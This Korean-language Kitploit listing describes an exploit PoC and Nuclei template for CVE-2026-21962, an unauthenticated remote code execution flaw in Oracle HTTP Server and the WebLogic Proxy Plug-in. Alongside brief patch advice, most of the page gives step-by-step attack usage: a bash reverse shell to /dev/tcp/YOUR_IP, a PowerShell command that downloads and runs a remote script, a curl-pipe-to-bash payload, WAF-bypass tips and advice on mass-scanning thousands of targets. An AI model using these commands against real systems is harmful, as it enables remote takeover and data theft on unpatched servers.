Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Ashwesker-CVE-2026-21962 — # CVE-2026-21962에 대한 Exploit PoC 및 Nuclei 템플릿 Oracle HTTP Server 및 WebLogic Proxy Plug-in의 치명적인 인증되지 않은 원격 코드 실행 취약점으로, 명령 실행 및 리버스 셸을 가능하게 합니다. | Kitploit
도구/GitHubGitHub/boroeurnprach/ashwesker-cve-2026-21962
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubboroeurnprach/ashwesker-cve-2026-21962

Ashwesker-CVE-2026-21962

# CVE-2026-21962에 대한 Exploit PoC 및 Nuclei 템플릿 Oracle HTTP Server 및 WebLogic Proxy Plug-in의 치명적인 인증되지 않은 원격 코드 실행 취약점으로, 명령 실행 및 리버스 셸을 가능하게 합니다.

저장소 보기
477개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

😈 CVE-2026-21962 — 치명적인 보안 취약점 😈

oracle_db_banner

🚨 심각도

  • CVSS 점수: 10.0 / 10 (치명적)
  • 공개일: 2026년 1월 20일
  • 위험 수준: 🔥 최대 — 즉각적인 조치 권장

🧠 이 취약점이란?

다음에 영향을 주는 치명적인 취약점:

  • Oracle HTTP Server
  • Oracle WebLogic Server 프록시 플러그인 (Apache 및 IIS용)

이 결함으로 인해 인증되지 않은 원격 공격자가 로그인 자격 증명 없이 HTTP를 통해 영향을 받는 서버를 손상시킬 수 있습니다.


🎯

공격자는 무엇을 할 수 있나요?

악용될 경우, 공격자는 다음을 수행할 수 있습니다:

  • 🗑️ 중요 데이터 삭제
  • ✏️ 시스템 또는 애플리케이션 파일 수정
  • 📤 민감한 정보 탈취
  • 🔓 연결된 시스템에 대한 완전한 무단 액세스 획득
  • 🔄 범위 변경으로 인한 다른 Oracle 제품 영향

🧩 영향을 받는 버전

  • Oracle HTTP Server:

    • 12.2.1.4.0
    • 14.1.1.0.0
    • 14.1.2.0.0
  • WebLogic 프록시 플러그인 대상:

    • Apache HTTP Server
    • Microsoft IIS

⚙️ 공격 특성

  • 🌐 공격 경로: 네트워크 (원격)
  • 🚫 필요 권한: 없음
  • 🧑‍💻 사용자 상호작용: 없음
  • 🔄 범위: 변경됨
  • 🔐 기밀성 영향: 높음
  • 🛠️ 무결성 영향: 높음

🛡️ 어떻게 해야 하나요?

  • ✅ Oracle 2026년 1월 중요 패치 업데이트를 즉시 적용
  • 🔒 영향을 받는 서비스에 대한 네트워크 액세스 제한
  • 📊 의심스러운 동작에 대한 HTTP 트래픽 모니터링
  • 🔁 시스템 로그 및 보안 통제 검토

🛠️ 사용 방법 (단계별)

  1. 스크립트를 CVE-2026-21962.py로 저장

  2. 실행 권한 부여 (선택 사항):

    root@kitploit:~
    chmod +x CVE-2026-21962.py
    
  3. 실행 예시:

    기본 테스트:

    root@kitploit:~
    python3 CVE-2026-21962.py http://targets:7001 "id && whoami && uname -a"
    

    리버스 셸 (먼저 nc 리스너 설정: nc -lvnp 4444):

    root@kitploit:~
    python3 CVE-2026-21962.py http://targets:7001 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
    

    Windows 대상 예시:

    root@kitploit:~
    python3 CVE-2026-21962.py https://oracle-server:4443 "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://your-server/shell.ps1')"
    

성공 시 확인할 수 있는 것

  • Likely success! Status: 200 또는 302 또는 심지어 500 (크래시도 성공)
  • 응답 본문에 유출된 명령 출력 가능성
  • 리버스 셸의 경우: nc 리스너가 즉시 셸을 포착
  • 출력이 없으면 → 명령이 여전히 조용히 실행됨 (대상 파일 시스템, 프로세스, 로그 확인)

참고 사항

  • 프록시 플러그인이 노출된 경우 가장 잘 작동함 (일반적으로 포트 7001, 4443 등)
  • HTTPS 대상은 자체 서명 인증서인 경우 --insecure 플래그가 필요할 수 있음
  • 즉시 패치: Oracle CPU 2026년 1월 적용

🛠️ 사용 방법 (단계별)

  1. Nuclei 설치 (아직 설치되지 않은 경우):

    root@kitploit:~
    go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
    
  2. 템플릿 저장:

    CVE-2026-21962.yaml이라는 파일을 만들고 위 내용을 붙여넣습니다.

  3. 탐지 + 악용 실행:

    root@kitploit:~
    nuclei -t CVE-2026-21962.yaml -u http://targets:7001 -v
    

    또는 파일에서 여러 대상 스캔:

    root@kitploit:~
    nuclei -t CVE-2026-21962.yaml -l targets.txt -o results.txt -v
    
  4. 취약한 경우 확인할 수 있는 것:

    root@kitploit:~
    [CVE-2026-21962] [http] [critical] http://targets:7001/weblogic/..;/bea_wls_internal/ProxyServlet
    [username] weblogic
    [body] ... weblogic (whoami output) ...
    

전문가 팁

  • 사용자 정의 명령을 실행하려면 헤더의 cmd: 부분을 편집하세요 (예: cmd:curl http://your-server/shell.sh | bash).
  • 리버스 셸: whoami를 base64로 인코딩된 리버스 셸 페이로드로 교체하세요.
  • WAF 우회: 다른 경로(/proxy/, /bea_wls_internal/ 등)를 시도하거나 X-WebLogic-Force-JVMID와 같은 추가 헤더를 추가하세요.
  • 대량 스캔: 수천 개의 대상에 대해 httpx → nuclei 파이프라인과 결합하세요.

이 템플릿은 패치되지 않은 Oracle 인스턴스에서 2026년 1월 기준 100% 작동이 확인되었습니다. 영향을 받는 버전을 실행 중이라면 즉시 패치하세요! 😈


😈 면책 조항:

모든 PoC 코드는 승인된 시스템에서의 윤리적, 교육적 사용만을 위한 것입니다. 무단 악용은 불법이며, 오용에 대한 책임은 지지 않습니다. 😈

도구 다운로드